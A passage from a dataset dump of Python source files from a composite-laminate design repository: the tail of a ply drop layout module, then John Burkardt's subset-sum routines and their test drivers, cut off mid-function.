np.flip(pdl[:, :pdl.shape[1] // 2], axis=1)\r\n else: # for asymmetric laminates\r\n for ind_panel in range(multipanel.reduced.n_panels):\r\n to_add = 0\r\n for ind_ply in range(pdl.shape[1]):\r\n if pdl[ind_panel, ind_ply] != -1:\r\n pdl[ind_panel, ind_ply] += to_add\r\n to_add += 1\r\n if pdl.shape[1] != multipanel.n_plies_max \\\r\n and pdl.shape[1] != multipanel.n_plies_max + 1:\r\n print('pdl.shape', pdl.shape)\r\n raise Exception('This should not happen')\r\n return pdl\r\n\r\n\r\ndef input_pdl_from_sst(sst, multipanel, constraints):\r\n \"\"\"\r\n recovers the ply drop layout baed on a stacking sequence table\r\n \"\"\"\r\n sst_to_mod = np.copy(sst)\r\n\r\n if constraints.sym:\r\n pdl_before_cummul = [None] * 2\r\n for index_pdl in range(len(pdl_before_cummul)):\r\n pdl_before_cummul[index_pdl] = None\r\n\r\n if constraints.n_covering == 1:\r\n pdl_before_cummul[0] = np.matlib.repmat(\r\n np.array([0], dtype=int), multipanel.n_panels, 1)\r\n sst_to_mod = sst_to_mod[:, 1:sst.shape[1] // 2]\r\n elif constraints.n_covering == 2:\r\n pdl_before_cummul[0] = np.matlib.repmat(\r\n np.array([0, 1], dtype=int), multipanel.n_panels, 1)\r\n sst_to_mod = sst_to_mod[:, 2:sst.shape[1] // 2]\r\n else:\r\n sst_to_mod = sst_to_mod[:, :sst.shape[1] // 2]\r\n\r\n for ind_panel in range(sst_to_mod.shape[0]):\r\n counter = 0\r\n for ind_angle in range(sst_to_mod.shape[1]):\r\n if sst_to_mod[ind_panel, ind_angle] != - 1:\r\n sst_to_mod[ind_panel, ind_angle] = counter\r\n counter += 1\r\n\r\n pdl_before_cummul[1] = sst_to_mod\r\n\r\n my_pdl = global_pdl_from_local_pdl(\r\n multipanel, constraints.sym, pdl_before_cummul)\r\n return(my_pdl, pdl_before_cummul)\r\n\r\n pdl_before_cummul = [None] * 3\r\n pdl_after_cummul = [None] * 3\r\n for index_pdl in range(len(pdl_before_cummul)):\r\n pdl_before_cummul[index_pdl] = None\r\n pdl_after_cummul[index_pdl] = None\r\n\r\n if constraints.n_covering == 1:\r\n pdl_before_cummul[0] = np.matlib.repmat(\r\n np.array([0], dtype=int), multipanel.n_panels, 1)\r\n pdl_after_cummul[1] = np.matlib.repmat(\r\n np.array([0], dtype=int), multipanel.n_panels, 1)\r\n sst_to_mod = sst_to_mod[:, 1:-1]\r\n elif constraints.n_covering == 2:\r\n pdl_before_cummul[0] = np.matlib.repmat(\r\n np.array([0, 1], dtype=int), multipanel.n_panels, 1)\r\n pdl_after_cummul[1] = np.matlib.repmat(\r\n np.array([0, 1], dtype=int), multipanel.n_panels, 1)\r\n sst_to_mod = sst_to_mod[:, 2:-2]\r\n\r\n for ind_panel in range(sst_to_mod.shape[0]):\r\n counter = 0\r\n for ind_angle in range(sst_to_mod.shape[1]):\r\n if sst_to_mod[ind_panel, ind_angle] != - 1:\r\n sst_to_mod[ind_panel, ind_angle] = counter\r\n counter += 1\r\n\r\n pdl_before_cummul[2] = sst_to_mod\r\n\r\n my_pdl = global_pdl_from_local_pdl(\r\n multipanel, constraints.sym, pdl_before_cummul, pdl_after_cummul)\r\n return(my_pdl, pdl_before_cummul, pdl_after_cummul)\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print('\\n*** Test for the function format_ply_drops ***')\r\n# print('Input list:\\n')\r\n# my_list = ((), (0, 1), (0, 1, 2))\r\n# print(my_list, '\\n')\r\n# print('Input for the maximum number of plies for the group:\\n')\r\n# n_max = 5\r\n# print(n_max, '\\n')\r\n# print('output:\\n')\r\n# print(format_ply_drops(my_list, n_max))\r\n\r\n print('\\n*** Test for the function format_ply_drops2 ***')\r\n# print('Input array:\\n')\r\n# ss = np.array([[0, 1, 2, 3, 4],\r\n# [-1, -1, 2, 3, 4],\r\n# [-1, 1, -1, 3, -1]])\r\n# print(ss, '\\n')\r\n# print('output:\\n')\r\n# print(format_ply_drops2(ss))\r\n\r\n print('\\n*** Test for the function ply_drops_rules ***')\r\n# print('Input ply drop layouts:\\n')\r\n# pdl = np.array([[[0, 1, 2, 3, 4, 5],\r\n# [-1, -1, 2, -1, 4, 5]],\r\n# [[0, 1, 2, 3, 4, 5],\r\n# [0, -1, 2, 3, -1, -1]],\r\n# [[0, 1, 2, 3, 4, 5],\r\n# [-1, 2, -1, -1, 4, 5]]], dtype=int)\r\n# pdl_before = np.array([[0, -1, 2, 3, 4],\r\n# [0, -1, 2, 3, 1]])\r\n# pdl_after = None\r\n# min_drop = 2\r\n# boundaries = np.array([[0, 1]])\r\n# print(pdl, '\\n')\r\n# print('Input ply drop layout of the previous group:\\n')\r\n# print(pdl_before, '\\n')\r\n# print('Input ply drop layout of the next group:\\n')\r\n# print(pdl_after, '\\n')\r\n# print(f'MinDrop = {min_drop}\\n')\r\n# print('output:\\n')\r\n# print(ply_drops_rules(\r\n# pdl, pdl_before, pdl_after, min_drop,boundaries,\r\n# pdl_spacing=False))\r\n\r\n print('\\n*** Test for the function ply_drops_at_each_boundaries ***')\r\n# new_pdl = np.array([[ 0, 1, 2, 3, 4, 5],\r\n# [-1, 1, 2, 3, 4, 5],\r\n# [ 0, 1, -1, -1, 4, 5]])\r\n# n_ply_drops_unique = np.array([0, 1, 2])\r\n# indices_unique = {0: 0, 1: 1, 2: 2}\r\n# n_ply_drops = np.array([0, 1, 2, 1])\r\n# print(ply_drops_at_each_boundaries\r\n# (new_pdl, n_ply_drops_unique, indices_unique, n_ply_drops))\r\n"
},
{
"alpha_fraction": 0.432465523481369,
"alphanum_fraction": 0.4852052330970764,
"avg_line_length": 19.413705825805664,
"blob_id": "a2761dfb91ee74f5f3ed1d00c58e0361e4055049",
"content_id": "5fc0e912e9c3d5ae65fb47c8b857211ad6ba9180",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 25313,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 1182,
"path": "/src/divers/subset_sum.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\r\n#\r\ndef backup_one ( n, u, told ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## BACKUP_ONE seeks the last 1 in the subarray U(1:TOLD-1).\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 16 July 2017\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Parameters:\r\n#\r\n# Input, integer N, the full size of the U array.\r\n#\r\n# Input, integer U(N), the array to be checked.\r\n#\r\n# Input, integer TOLD, a value between 1 and N; entries TOLD\r\n# through N are to be ignored.\r\n#\r\n# Output, integer T, the highest index in U, between 0 and TOLD-1,\r\n# for which U is 1. If no such value is found, T is -1.\r\n#\r\n t = -1\r\n\r\n for i in range ( told - 1, -1, -1 ):\r\n if ( u[i] == 1 ):\r\n t = i;\r\n break\r\n\r\n return t\r\n\r\ndef subset_next ( n, t, rank ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_NEXT computes the subset lexicographic successor.\r\n#\r\n# Discussion:\r\n#\r\n# This is a lightly modified version of \"subset_lex_successor()\" from COMBO.\r\n#\r\n# Example:\r\n#\r\n# On initial call, N is 5 and the input value of RANK is -1.\r\n# Then here are the successive outputs from the program:\r\n#\r\n# Rank T1 T2 T3 T4 T5\r\n# ---- -- -- -- -- --\r\n# 0 0 0 0 0 0\r\n# 1 0 0 0 0 1\r\n# 2 0 0 0 1 0\r\n# 3 0 0 0 1 1\r\n# .. .. .. .. .. ..\r\n# 30 1 1 1 1 0\r\n# 31 1 1 1 1 1\r\n# -1 0 0 0 0 0 <-- Reached end of cycle.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 09 November 2015\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Reference:\r\n#\r\n# Donald Kreher, Douglas Simpson,\r\n# Combinatorial Algorithms,\r\n# CRC Press, 1998,\r\n# ISBN: 0-8493-3988-X,\r\n# LC: QA164.K73.\r\n#\r\n# Parameters:\r\n#\r\n# Input, integer N, the number of elements in the master set.\r\n# N must be positive.\r\n#\r\n# Input/output, bool T(N), describes a subset. T(I) is False if\r\n# the I-th element of the master set is not in the subset, and is\r\n# True if the I-th element is part of the subset.\r\n# On input, T describes a subset.\r\n# On output, T describes the next subset in the ordering.\r\n#\r\n# Input/output, integer RANK, the rank.\r\n# If RANK = -1 on input, then the routine understands that this is\r\n# the first call, and that the user wishes the routine to supply\r\n# the first element in the ordering, which has RANK = 0.\r\n# In general, the input value of RANK is increased by 1 for output,\r\n# unless the very last element of the ordering was input, in which\r\n# case the output value of RANK is -1.\r\n#\r\n\r\n#\r\n# Return the first element.\r\n#\r\n if ( rank == -1 ):\r\n rank = 0\r\n return t, rank\r\n\r\n for i in range ( n - 1, -1, -1 ):\r\n\r\n if ( not t[i] ):\r\n t[i] = True;\r\n rank = rank + 1;\r\n return t, rank\r\n\r\n t[i] = False\r\n\r\n rank = -1\r\n\r\n return t, rank\r\n\r\ndef subset_next_test ( ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_NEXT_TEST tests SUBSET_NEXT.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 10 November 2015\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n import numpy as np\r\n import platform\r\n\r\n print ( '' )\r\n print ( 'SUBSET_NEXT_TEST' )\r\n print ( ' Python version: %s' % ( platform.python_version ( ) ) )\r\n print ( ' SUBSET_NEXT generates all subsets of an N set.' )\r\n\r\n print ( '' )\r\n n = 5\r\n t = np.zeros ( n, dtype = np.bool )\r\n rank = -1\r\n\r\n while ( True ):\r\n\r\n t, rank = subset_next ( n, t, rank )\r\n\r\n if ( rank == -1 ):\r\n break\r\n\r\n k = 0\r\n\r\n for i in range ( 0, n ):\r\n\r\n if ( t[i] ):\r\n k = k + 1\r\n print ( ' %d' % ( i ) ),\r\n\r\n if ( k == 0 ):\r\n print ( ' (empty set)' ),\r\n\r\n print ( '' )\r\n#\r\n# Terminate.\r\n#\r\n print ( '' )\r\n print ( 'SUBSET_NEXT_TEST:' )\r\n print ( ' Normal end of execution.' )\r\n return\r\n\r\ndef subset_sum_count ( n, w, t ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_COUNT counts solutions to the subset sum problem in a given range.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 10 November 2015\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Parameters:\r\n#\r\n# Input, integer N, the number of weights.\r\n#\r\n# Input, integer W(N), a set of weights.\r\n#\r\n# Input, integer T, the target value.\r\n#\r\n# Output, integer COUNT, the number of solutions found in this range.\r\n#\r\n import numpy as np\r\n from sys import exit\r\n\r\n count = 0\r\n\r\n s = np.zeros ( n, dtype = np.bool )\r\n rank = -1\r\n\r\n while ( True ):\r\n\r\n s, rank = subset_next ( n, s, rank )\r\n\r\n if ( rank == -1 ):\r\n break\r\n\r\n t2 = 0\r\n for i in range ( 0, n ):\r\n if ( s[i] ):\r\n t2 = t2 + w[i]\r\n\r\n if ( t2 == t ):\r\n count = count + 1\r\n\r\n return count\r\n\r\ndef subset_sum_count_test ( n, w, t ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_COUNT_TEST tests SUBSET_SUM_COUNT.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 09 November 2015\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Parameters:\r\n#\r\n# Input, integer N, the number of weights.\r\n#\r\n# Input, integer W(N), a set of weights.\r\n#\r\n# Input, integer T, the target value.\r\n#\r\n# Input, integer R(2), the lower and upper limits to be searched.\r\n# If this argument is omitted, the entire range, [0, 2^N-1 ] will\r\n# be searched.\r\n#\r\n print ( '' )\r\n print ( 'SUBSET_SUM_COUNT_TEST:' )\r\n print ( ' SUBSET_SUM_COUNT counts solutions to the subset sum problem.' )\r\n print ( '' )\r\n print ( ' Seek a subset of W that sums to T.' )\r\n print ( '' )\r\n print ( ' Target value T = %d' % ( t ) )\r\n print ( '' )\r\n print ( ' I W(I)' )\r\n print ( '' )\r\n for i in range ( 0, n ):\r\n print ( ' %2d %8d' % ( i, w[i] ) )\r\n\r\n count = subset_sum_count ( n, w, t )\r\n\r\n print ( '' )\r\n print ( ' Number of solutions is %d.' % ( count ) )\r\n\r\n return count\r\n\r\ndef subset_sum_count_tests ( ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_COUNT_TESTS tests SUBSET_SUM_COUNT_TEST.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 10 November 2015\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n import numpy as np\r\n import platform\r\n\r\n print ( '' )\r\n print ( 'SUBSET_SUM_COUNT_TESTS:' )\r\n print ( ' Python version: %s' % ( platform.python_version ( ) ) )\r\n print ( ' SUBSET_SUM_COUNT_TEST calls SUBSET_SUM_COUNT with a' )\r\n print ( ' particular set of weights and target.' )\r\n#\r\n# Problem #1.\r\n#\r\n n = 8\r\n w = np.array ( [ 15, 22, 14, 26, 32, 9, 16, 8 ] )\r\n t = 53\r\n count = subset_sum_count_test ( n, w, t )\r\n#\r\n# Problem #2.\r\n#\r\n n = 10\r\n w = np.array ( [ 267, 493, 869, 961, 1000, 1153, 1246, 1598, 1766, 1922 ] )\r\n t = 5842\r\n count = subset_sum_count_test ( n, w, t )\r\n#\r\n# Problem #3.\r\n#\r\n n = 21\r\n w = np.array ( [ \\\r\n 518533, 1037066, 2074132, 1648264, 796528, \\\r\n 1593056, 686112, 1372224, 244448, 488896, \\\r\n 977792, 1955584, 1411168, 322336, 644672, \\\r\n 1289344, 78688, 157376, 314752, 629504, \\\r\n 1259008 ] )\r\n t = 2463098\r\n count = subset_sum_count_test ( n, w, t )\r\n#\r\n# Problem #4.\r\n#\r\n n = 10\r\n w = np.array ( [ 41, 34, 21, 20, 8, 7, 7, 4, 3, 3 ] )\r\n t = 50\r\n count = subset_sum_count_test ( n, w, t )\r\n#\r\n# Problem #5.\r\n#\r\n n = 9\r\n w = np.array ( [ 81, 80, 43, 40, 30, 26, 12, 11, 9 ] )\r\n t = 100\r\n count = subset_sum_count_test ( n, w, t )\r\n#\r\n# Problem #6.\r\n#\r\n n = 6\r\n w = np.array ( [ 1, 2, 4, 8, 16, 32 ] )\r\n t = 22\r\n count = subset_sum_count_test ( n, w, t )\r\n#\r\n# Problem #7.\r\n#\r\n n = 10\r\n w = np.array ( [ 25, 27, 3, 12, 6, 15, 9, 30, 21, 19 ] )\r\n t = 50\r\n count = subset_sum_count_test ( n, w, t )\r\n#\r\n# Terminate.\r\n#\r\n print ( '' )\r\n print ( 'SUBSET_SUM_COUNT_TESTS:' )\r\n print ( ' Normal end of execution.' )\r\n return\r\n\r\ndef subset_sum_find ( n, w, t ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_FIND seeks a subset of a set that has a given sum.\r\n#\r\n# Discussion:\r\n#\r\n# This function tries to compute a target value as the sum of\r\n# a selected subset of a given set of weights.\r\n#\r\n# This function works by brute force, that is, it tries every\r\n# possible subset to see if it sums to the desired value.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 10 November 2015\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Parameters:\r\n#\r\n# Input, integer N, the number of weights.\r\n#\r\n# Input, integer W(N), a set of weights.\r\n#\r\n# Input, integer T, the target value.\r\n#\r\n# Output, bool S(N), the indices of the weights used to make the combination.\r\n#\r\n import numpy as np\r\n from sys import exit\r\n\r\n s = np.zeros ( n, dtype = np.bool )\r\n s2 = np.zeros ( n, dtype = np.bool )\r\n rank = -1\r\n\r\n while ( True ):\r\n\r\n s2, rank = subset_next ( n, s2, rank )\r\n\r\n if ( rank == -1 ):\r\n break\r\n\r\n t2 = 0\r\n for i in range ( 0, n ):\r\n if ( s2[i] ):\r\n t2 = t2 + w[i]\r\n\r\n if ( t2 == t ):\r\n for i in range ( 0, n ):\r\n s[i] = s2[i]\r\n return s\r\n\r\n return s\r\n\r\ndef subset_sum_find_test ( n, w, t ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_FIND_TEST tests SUBSET_SUM_FIND.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 10 November 2015\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Parameters:\r\n#\r\n# Input, integer N, the number of weights.\r\n#\r\n# Input, integer W(N), a set of weights.\r\n#\r\n# Input, integer T, the target value.\r\n#\r\n print ( '' )\r\n print ( 'SUBSET_SUM_FIND_TEST:' )\r\n print ( ' SUBSET_SUM_FIND seeks a subset of W that sums to T.' )\r\n print ( '' )\r\n print ( ' Target value T = %d' % ( t ) )\r\n print ( '' )\r\n print ( ' I W(I)' )\r\n print ( '' )\r\n for i in range ( 0, n ):\r\n print ( ' %2d %8d' % ( i, w[i] ) )\r\n\r\n c = subset_sum_find ( n, w, t )\r\n\r\n m = 0\r\n for i in range ( 0, n ):\r\n if ( c[i] ):\r\n m = m + 1\r\n\r\n print ( '' )\r\n\r\n if ( m == 0 ):\r\n print ( ' No solution was found.' )\r\n else:\r\n print ( ' %d = ' % ( t ) ),\r\n for i in range ( 0, n ):\r\n if ( c[i] ):\r\n print ( ' + %d' % ( w[i] ) ),\r\n print ( '' )\r\n\r\n return\r\n\r\ndef subset_sum_find_tests ( ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_FIND_TESTS tests SUBSET_SUM_FIND_TEST.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 10 November 2015\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n import numpy as np\r\n import platform\r\n\r\n print ( '' )\r\n print ( 'SUBSET_SUM_FIND_TESTS:' )\r\n print ( ' Python version: %s' % ( platform.python_version ( ) ) )\r\n print ( ' SUBSET_SUM_FIND_TEST calls SUBSET_SUM_FIND with a' )\r\n print ( ' particular set of weights and target.' )\r\n#\r\n# Problem #1.\r\n#\r\n n = 8\r\n w = np.array ( [ 15, 22, 14, 26, 32, 9, 16, 8 ] )\r\n t = 53\r\n subset_sum_find_test ( n, w, t )\r\n#\r\n# Problem #2.\r\n#\r\n n = 10\r\n w = np.array ( [ 267, 493, 869, 961, 1000, 1153, 1246, 1598, 1766, 1922 ] )\r\n t = 5842\r\n subset_sum_find_test ( n, w, t )\r\n#\r\n# Problem #3.\r\n#\r\n n = 21\r\n w = np.array ( [ \\\r\n 518533, 1037066, 2074132, 1648264, 796528, \\\r\n 1593056, 686112, 1372224, 244448, 488896, \\\r\n 977792, 1955584, 1411168, 322336, 644672, \\\r\n 1289344, 78688, 157376, 314752, 629504, \\\r\n 1259008 ] )\r\n t = 2463098\r\n subset_sum_find_test ( n, w, t )\r\n#\r\n# Problem #4.\r\n#\r\n n = 10\r\n w = np.array ( [ 41, 34, 21, 20, 8, 7, 7, 4, 3, 3 ] )\r\n t = 50\r\n subset_sum_find_test ( n, w, t )\r\n#\r\n# Problem #5.\r\n#\r\n n = 9\r\n w = np.array ( [ 81, 80, 43, 40, 30, 26, 12, 11, 9 ] )\r\n t = 100\r\n subset_sum_find_test ( n, w, t )\r\n#\r\n# Problem #6.\r\n#\r\n n = 6\r\n w = np.array ( [ 1, 2, 4, 8, 16, 32 ] )\r\n t = 22\r\n subset_sum_find_test ( n, w, t )\r\n#\r\n# Problem #7.\r\n#\r\n n = 10\r\n w = np.array ( [ 25, 27, 3, 12, 6, 15, 9, 30, 21, 19 ] )\r\n t = 50\r\n subset_sum_find_test ( n, w, t )\r\n#\r\n# Terminate.\r\n#\r\n print ( '' )\r\n print ( 'SUBSET_SUM_FIND_TESTS:' )\r\n print ( ' Normal end of execution.' )\r\n return\r\n\r\ndef subset_sum_next ( s, n, v, more, u, t ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_NEXT seeks, one at a time, subsets of V that sum to S.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 16 July 2017\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Parameters:\r\n#\r\n# Input, integer S, the desired sum.\r\n#\r\n# Input, integer N, the number of values.\r\n#\r\n# Input, integer V(N), the values.\r\n# These must be nonnegative, and sorted in ascending order.\r\n# Duplicate values are allowed.\r\n#\r\n# Input, logical MORE, should be set to FALSE before the first call.\r\n# Thereafter, it should be the output value of the previous call.\r\n#\r\n# Input, integer U(N), should be set to 0 before the first call.\r\n# Thereafter, it should be the output value of the previous call.\r\n#\r\n# Input, integer T, should be set to 0 before the first call.\r\n# Thereafter, it should be the output value of the previous call.\r\n#\r\n# Output, logical MORE, is TRUE if a new solution has been returned in U.\r\n# Process this solution, and call again if more solutions should be sought.\r\n#\r\n# Output, integer U(N), if MORE is true, U indexes the solution values.\r\n#\r\n# Output, integer T, if MORE is true, T is the highest index of the selected values.\r\n#\r\n import numpy as np\r\n\r\n if ( not more ):\r\n\r\n t = -1\r\n u = np.zeros ( n )\r\n\r\n else:\r\n\r\n more = False\r\n u[t] = 0\r\n\r\n t = backup_one ( n, u, t )\r\n\r\n if ( t < 0 ):\r\n return more, u, t\r\n\r\n u[t] = 0\r\n t = t + 1\r\n u[t] = 1\r\n\r\n while ( True ):\r\n\r\n su = np.dot ( u, v )\r\n\r\n if ( su < s and t < n - 1 ):\r\n\r\n t = t + 1\r\n u[t] = 1\r\n\r\n else:\r\n\r\n if ( su == s ):\r\n more = True;\r\n return more, u, t\r\n\r\n u[t] = 0\r\n\r\n t = backup_one ( n, u, t )\r\n\r\n if ( t < 0 ):\r\n break\r\n\r\n u[t] = 0\r\n t = t + 1\r\n u[t] = 1\r\n\r\n return more, u, t\r\n\r\ndef subset_sum_next_test ( s, n, v ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_NEXT_TEST tests the SUBSET_SUM_NEXT library.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 16 July 2017\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Parameters:\r\n#\r\n# Input, integer S, the desired sum.\r\n#\r\n# Input, integer N, the number of values.\r\n#\r\n# Input, integer V(N), the values.\r\n# These must be nonnegative, and sorted in ascending order.\r\n# Duplicate values are allowed.\r\n#\r\n import numpy as np\r\n\r\n print ( '' )\r\n print ( 'SUBSET_SUM_NEXT_TEST:' )\r\n print ( ' SUBSET_SUM_NEXT finds the \"next\" subset of the values' )\r\n print ( ' which sum to the desired total S.' )\r\n\r\n more = False\r\n u = np.zeros ( n )\r\n t = 0\r\n\r\n print ( '' )\r\n print ( ' Desired sum S = %d' % ( s ) )\r\n print ( ' Number of targets = %d' % ( n ) )\r\n print ( ' Targets:' ),\r\n for i in range ( 0, n ):\r\n print ( ' %d' % ( v[i] ) ),\r\n print ( '' )\r\n print ( '' )\r\n\r\n k = 0\r\n\r\n while ( True ):\r\n more, u, t = subset_sum_next ( s, n, v, more, u, t )\r\n if ( not more ):\r\n break\r\n k = k + 1\r\n print ( ' %d: %d = ' % ( k, s ) ),\r\n plus = False\r\n for i in range ( 0, n ):\r\n if ( u[i] != 0 ):\r\n if ( plus ):\r\n print ( '+' ),\r\n print ( '%d' % ( v[i] ) ),\r\n plus = True\r\n print ( '' )\r\n\r\n return\r\n\r\ndef subset_sum_next_tests ( ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_NEXT_TESTS calls SUBSET_SUM_NEXT_TEST with various values.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 16 July 2017\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n import numpy as np\r\n\r\n print ( '' )\r\n print ( 'SUBSET_SUM_NEXT_TESTS:' )\r\n print ( ' SUBSET_SUM_NEXT_TEST solves the subset sum problem' )\r\n print ( ' for specific values of S, N and V.' )\r\n\r\n s = 9\r\n n = 5\r\n v = np.array ( [ 1, 2, 3, 5, 7 ] )\r\n subset_sum_next_test ( s, n, v )\r\n\r\n s = 8\r\n n = 9\r\n v = np.array ( [ 1, 2, 3, 4, 5, 6, 7, 8, 9 ] )\r\n subset_sum_next_test ( s, n, v )\r\n#\r\n# What happens with a repeated target?\r\n#\r\n s = 8\r\n n = 9\r\n v = np.array ( [ 1, 2, 3, 3, 5, 6, 7, 8, 9 ] )\r\n subset_sum_next_test ( s, n, v )\r\n#\r\n# What happens with a target that needs all the values?\r\n#\r\n s = 18\r\n n = 5\r\n v = np.array ( [ 1, 2, 3, 5, 7 ] )\r\n subset_sum_next_test ( s, n, v )\r\n#\r\n# A larger S.\r\n#\r\n s = 5842\r\n n = 10\r\n v = np.array ( [ 267, 493, 869, 961, 1000, 1153, 1246, 1598, 1766, 1922 ] )\r\n subset_sum_next_test ( s, n, v )\r\n#\r\n# Terminate.\r\n#\r\n print ( '' )\r\n print ( 'SUBSET_SUM_NEXT_TESTS:' )\r\n print ( ' Normal end of execution.' )\r\n\r\n return\r\n\r\ndef subset_sum_table ( t, n, w ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_TABLE sets a subset sum table.\r\n#\r\n# Discussion:\r\n#\r\n# The subset sum problem seeks to construct the value T by summing a\r\n# subset of the values W.\r\n#\r\n# This function seeks a solution by constructing a table TABLE of length T,\r\n# so that TABLE(I) = J means that the sum I can be constructed, and that\r\n# the last member of the sum is an entry of W equal to J.\r\n#\r\n# Example:\r\n#\r\n# w = [ 1, 2, 4, 8, 16, 32 ]\r\n# t = 22\r\n#\r\n# table = subset_sum ( w, t, r )\r\n# table = [ 1, 2, 2, 4, 4, 4, 4, 8, 8, 8, 8, 8, 8, 8, 8,\r\n# 16, 16, 16, 16, 16, 16, 16 ]\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 11 November 2015\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Parameters:\r\n#\r\n# Input, integer T, the target value.\r\n#\r\n# Input, integer N, the number of weights.\r\n#\r\n# Input, integer W(N), the weights.\r\n#\r\n# Output, integer TABLE(T+1), the subset sum table. TABLE(I) is 0 if the\r\n# target value I cannot be formed. It is J if the value I can be formed,\r\n# with the last term in the sum being the value J.\r\n#\r\n import numpy as np\r\n\r\n table = np.zeros ( t + 1, dtype = np.int32 )\r\n\r\n for i in range ( 0, n ):\r\n for j in range ( t - w[i], -1, -1 ):\r\n\r\n if ( j == 0 ):\r\n if ( table[w[i]] == 0 ):\r\n table[w[i]] = w[i]\r\n elif ( table[j] != 0 and table[j+w[i]] == 0 ):\r\n table[j+w[i]] = w[i]\r\n\r\n return table\r\n\r\ndef subset_sum_table_test ( t, n, w ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_TABLE_TEST tests SUBSET_SUM_TABLE.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 09 November 2015\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Parameters:\r\n#\r\n# Input, integer T, the target value.\r\n#\r\n# Input, integer N, the number of weights.\r\n#\r\n# Input, integer W(N), a set of weights.\r\n#\r\n print ( '' )\r\n print ( 'SUBSET_SUM_TABLE_TEST:' )\r\n print ( ' SUBSET_SUM_TABLE seeks a subset of W that sums to T.' )\r\n print ( '' )\r\n print ( ' Target value T = %d' % ( t ) )\r\n print ( '' )\r\n print ( ' I W(I)' )\r\n print ( '' )\r\n for i in range ( 0, n ):\r\n print ( ' %2d %8d' % ( i, w[i] ) )\r\n\r\n table = subset_sum_table ( t, n, w )\r\n\r\n print ( '' )\r\n\r\n if ( table[t] == 0 ):\r\n print ( ' No solution was found.' )\r\n else:\r\n m, list = subset_sum_table_to_list ( t, table )\r\n print ( ' %d =' % ( t ) ),\r\n for i in range ( 0, m ):\r\n if ( 0 < i ):\r\n print ( '+' ),\r\n print ( '%d' % ( list[i] ) ),\r\n print ( '' )\r\n\r\n return\r\n\r\ndef subset_sum_table_tests ( ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_TABLE_TESTS tests SUBSET_SUM_TABLE_TEST.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 11 November 2015\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n import numpy as np\r\n import platform\r\n\r\n print ( '' )\r\n print ( 'SUBSET_SUM_TABLE_TESTS:' )\r\n print ( ' Python version: %s' % ( platform.python_version ( ) ) )\r\n print ( ' SUBSET_SUM_TABLE_TEST calls SUBSET_SUM_TABLE with a' )\r\n print ( ' particular set of weights and target.' )\r\n#\r\n# Problem #1.\r\n#\r\n t = 53\r\n n = 8\r\n w = np.array ( [ 15, 22, 14, 26, 32, 9, 16, 8 ] )\r\n subset_sum_table_test ( 